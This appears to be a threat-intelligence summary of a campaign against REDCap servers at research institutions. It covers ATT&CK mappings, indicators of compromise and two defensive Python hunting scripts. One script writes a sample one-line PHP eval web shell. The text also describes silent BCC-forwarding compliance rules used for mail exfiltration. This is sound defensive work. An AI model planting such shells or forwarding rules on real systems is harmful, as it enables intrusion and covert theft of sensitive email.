Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research

Google Threat Intelligence Group attributed a long-running campaign to UNC6508, which targeted North American academic, medical, and military research institutions by compromising REDCap servers, deploying the INFINITERED malware, and stealing credentials and data. The actor later abused enterprise content compliance rules to silently forward sensitive emails to a threat actor-controlled Gmail account while using strong operational security and proxy infrastructure to stay hidden. #UNC6508 #REDCap #INFINITERED #BebitaBarefoot774gmailcom

Keypoints

  • GTIG linked the campaign with high confidence to UNC6508, a PRC-nexus threat actor.
  • The victim set included North American academic, medical, and military research organizations, with activity spanning more than a year.
  • Initial access was achieved by exploiting externally facing REDCap servers and then deploying the INFINITERED malware.
  • INFINITERED harvested login credentials, persisted through upgrades, and maintained backdoor access on compromised systems.
  • UNC6508 used stolen credentials to pivot into internal networks and later access administrator accounts.
  • The actor abused content compliance rules to BCC-forward matching emails to a Gmail account under their control for covert exfiltration.
  • GTIG disrupted associated infrastructure, notified victims, and published detections, IOCs, and hardening guidance.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – UNC6508 gained initial access by exploiting exposed REDCap servers (‘exploited externally facing REDCap servers’).
  • [T1505.003] Server Software Component: Web Shell – The actor deployed a web shell named help.php to keep access and upload further files (‘deployed a web shell named “help.php”’).
  • [T1554] Compromise Host Software Binary – INFINITERED overwrote legitimate REDCap PHP files and hooked the upgrade process so that its code is re-injected into each new REDCap version (‘injects its code into new REDCap versions by intercepting the upgrade process’). REDCap is a server-side PHP application, so this overlaps with T1505 (Server Software Component).
  • [T1027] Obfuscated Files or Information – The injected logic is stored Base64-encoded between GUID delimiters and decoded at runtime, so the plaintext payload is not visible in the modified files (‘Base64 GUID delimiter’, ‘extract the malicious logic using GUID delimiter’).
  • [T1090.003] Proxy: Multi-hop Proxy – UNC6508 routed its operations through operational relay box (ORB) networks built from compromised routers, residential proxies and VPS infrastructure (‘routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers’).
  • [T1595.002] Active Scanning: Vulnerability Scanning – UNC6508 probed for outdated REDCap installations that remained reachable alongside patched ones (‘probing for these vulnerable legacy versions’).
  • [T1056.003] Input Capture: Web Portal Capture – The credential harvester captured usernames and passwords submitted to the REDCap login page (‘captures usernames and passwords submitted via POST requests during the login process’).
  • [T1074.001] Data Staged: Local Data Staging – Harvested credentials and other collected data were staged inside a local REDCap sessions database table rather than written to obvious files (‘hides inside a local REDCap sessions database table’).
  • [T1114.003] Email Collection: Email Forwarding Rule – Using the compromised administrator access, UNC6508 created a content compliance rule named “Patroit” that BCC-forwards every matching message to an attacker-controlled Gmail address (‘used regular expressions to match … emails’). Because the rule lives in the domain-level mail settings rather than in the mailbox, the copy is invisible to the user whose mail is being taken (‘Silently “BCC-forward” matched emails’).
  • [T1213] Data from Information Repositories – The rule matched on keywords and email address patterns of intelligence interest to the actor (‘matching on keyword and email address patterns in sent or received emails’).
  • [T1071.001] Application Layer Protocol: Web Protocols – INFINITERED beacons system information and receives tasking over HTTP; the channel is carried in a cookie named REDCAP-TOKEN and commands are identified by tags in the payload (‘REDCAP-TOKEN’ cookie parameter, ‘beacons system information’, ‘parse the payload for command tags’).
  • [T1567] Exfiltration Over Web Service – The forwarded mail lands in a threat actor-controlled Gmail account, so exfiltration rides on a legitimate web mail service (‘BCC-forwarded to a threat actor-controlled Gmail address’).
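A host-side hunt that ties together the file-level techniques above (web shell, modified REDCap files, GUID-delimited Base64 payload). This is an added example, not GTIG's detection content or REDCap's own code. The indicator values (GUID delimiter, command tag, database prefix, cookie name, the two published hashes) are the ones listed on this page; the assumption that the injected payload sits Base64-encoded between two copies of the GUID is an illustration of the technique, not a statement of INFINITERED's exact on-disk layout, and the sample webroot the script builds is constructed for the example.

```python
"""Hunt a REDCap document root for INFINITERED-style artifacts.

Added example, not GTIG's or REDCap's own code. Indicator values are the
ones listed on this page; the on-disk layout assumed here (a Base64 blob
between two copies of the GUID delimiter) is an illustration of the
technique, not a statement of the malware's exact format.
"""
import base64
import binascii
import hashlib
import os
import re
import tempfile

GUID_DELIM = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
STRING_IOCS = ("REDCAP-TOKEN", "ej671a16i7fd8202nu6ltfg5p6x7u", "xc32038474a")
HASH_IOCS = {
    "ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7",
    "db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136",
}
WEBSHELL_NAMES = {"help.php"}  # weak on its own; confirm by content

# Assumed layout: GUID, Base64 payload (possibly wrapped), GUID.
_PAYLOAD_RE = re.compile(re.escape(GUID_DELIM) + r"(.*?)" + re.escape(GUID_DELIM), re.S)


def extract_payloads(text):
    """Decode every blob found between a pair of GUID delimiters.

    A delimiter pair whose contents are not valid Base64 is reported as
    None: the marker itself is the indicator, the decode is a bonus.
    """
    decoded = []
    for blob in _PAYLOAD_RE.findall(text):
        blob = re.sub(r"\s+", "", blob)
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append(None)
    return decoded


def scan_file(path):
    """Return a list of (finding_type, detail) tuples for one PHP file."""
    findings = []
    with open(path, "rb") as fh:
        data = fh.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest in HASH_IOCS:
        findings.append(("hash_match", digest))
    if os.path.basename(path) in WEBSHELL_NAMES:
        findings.append(("webshell_name", os.path.basename(path)))
    text = data.decode("utf-8", "replace")
    for ioc in STRING_IOCS:
        if ioc in text:
            findings.append(("string_ioc", ioc))
    for payload in extract_payloads(text):
        findings.append(("guid_payload", payload))
        # Strings hidden inside the encoded stage are missed by the
        # plaintext check above, so look again after decoding.
        for ioc in STRING_IOCS:
            if payload and ioc in payload:
                findings.append(("string_ioc_in_payload", ioc))
    return findings


def scan_webroot(root):
    """Map relative path -> findings for every .php file with at least one hit."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                results[os.path.relpath(path, root)] = hits
    return results


def build_sample_webroot():
    """Constructed sample tree for the example: a clean entry point, a
    legitimate REDCap file with an implant spliced into a comment, and a
    one-line web shell. Returns the temporary directory path."""
    root = tempfile.mkdtemp(prefix="redcap-hunt-")
    stage = base64.b64encode(b"<?php /* stage loaded via REDCAP-TOKEN cookie */ ?>").decode()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php require 'redcap_connect.php'; ?>\n")
    with open(os.path.join(root, "redcap_connect.php"), "w") as fh:
        fh.write("<?php // legitimate prologue\n/*" + GUID_DELIM + stage + GUID_DELIM + "*/\n")
    with open(os.path.join(root, "help.php"), "w") as fh:
        fh.write("<?php @eval($_POST['c']); ?>\n")
    return root


if __name__ == "__main__":
    for rel, hits in scan_webroot(build_sample_webroot()).items():
        print(rel, hits)
```

Point scan_webroot() at the real document root instead of the constructed tree. A help.php name match is weak by itself, and a redcap_connect.php hit only matters when its contents or hash differ from the shipped release, since that file is part of a normal REDCap install; pair the string and GUID matches with a diff against a pristine REDCap distribution of the same version.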

Indicators of Compromise

  • [Email] Exfiltration account used for covert forwarding – [email protected]
  • [IP address] Source of admin login from compromised infrastructure – 23.169.65.49
  • [File hashes] INFINITERED-related malware and persistence components – ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7, db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136, and 5 more hashes
  • [File names] Web shell and modified REDCap file – help.php (web shell dropped by the actor), redcap_connect.php (a legitimate REDCap file that INFINITERED modifies; its presence is normal, only altered contents or a matching hash are indicative)
  • [GUID / string marker] INFINITERED version delimiter and database prefix – b49e334d-9c01-463e-9bc5-00a6920fb66e, xc32038474a
  • [Cookie / command tag] C2 and command marker values used by INFINITERED – REDCAP-TOKEN, ej671a16i7fd8202nu6ltfg5p6x7u
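Detecting the REDCAP-TOKEN channel in web server logs, as an added example that is not part of the original report. It assumes an Apache LogFormat that records the Cookie request header (the default formats do not), and the value layout `<command tag>.<base64>` in the sample line is an assumption; the page states only that the cookie name and the tag string are C2 markers. The log lines and the 203.0.113.x / 198.51.100.x addresses are constructed; 23.169.65.49 is the admin-login source listed above.

```python
"""Flag HTTP requests that carry INFINITERED's REDCAP-TOKEN C2 cookie.

Added example, not GTIG's or REDCap's own tooling. Assumes an Apache
LogFormat that records the Cookie request header, e.g.
    LogFormat "%h %t \"%r\" %>s \"%{Cookie}i\"" c2hunt
The sample lines below are constructed for the example; the
"<tag>.<base64>" cookie value layout is an assumption.
"""
import re
from collections import Counter

C2_COOKIE = "REDCAP-TOKEN"
COMMAND_TAG = "ej671a16i7fd8202nu6ltfg5p6x7u"
KNOWN_BAD_IPS = {"23.169.65.49"}  # admin-login source IP from this page

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.10 [11/Mar/2025:10:02:01 +0000] "GET /redcap/index.php HTTP/1.1" 200 "PHPSESSID=abc123"
23.169.65.49 [11/Mar/2025:10:02:07 +0000] "POST /redcap/redcap_connect.php HTTP/1.1" 200 "PHPSESSID=def456; REDCAP-TOKEN=ej671a16i7fd8202nu6ltfg5p6x7u.aGVsbG8="
198.51.100.7 [11/Mar/2025:10:03:15 +0000] "GET /redcap/help.php HTTP/1.1" 404 "-"
198.51.100.7 [11/Mar/2025:10:04:40 +0000] "GET /redcap/index.php HTTP/1.1" 200 "REDCAP-TOKEN=beacon"
"""


def parse_cookies(header):
    """Split a raw Cookie header into a dict; values may themselves contain '='."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            cookies[key.strip()] = value.strip()
    return cookies


def find_c2_beacons(lines):
    """Return one record per request whose Cookie header names REDCAP-TOKEN."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line.rstrip("\n"))
        if not match:
            continue  # line in another format: skip, never guess
        cookies = parse_cookies(match["cookie"])
        if C2_COOKIE not in cookies:
            continue
        value = cookies[C2_COOKIE]
        hits.append({
            "ip": match["ip"],
            "time": match["ts"],
            "request": match["req"],
            "has_command_tag": COMMAND_TAG in value,
            "known_bad_ip": match["ip"] in KNOWN_BAD_IPS,
        })
    return hits


def summarize(hits):
    """Beacon count per source IP, the first thing to pivot on."""
    return Counter(hit["ip"] for hit in hits)


if __name__ == "__main__":
    beacons = find_c2_beacons(SAMPLE_LOG.splitlines())
    for beacon in beacons:
        print(beacon)
    print(summarize(beacons))
```

Any request carrying this cookie name is worth a ticket regardless of the tag: legitimate REDCap sessions do not use it. Requests from an address in the known-bad set, or whose cookie value contains the command tag, go to the top of the queue, and the per-IP summary shows which sources are beaconing on a schedule.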


Read more: https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research/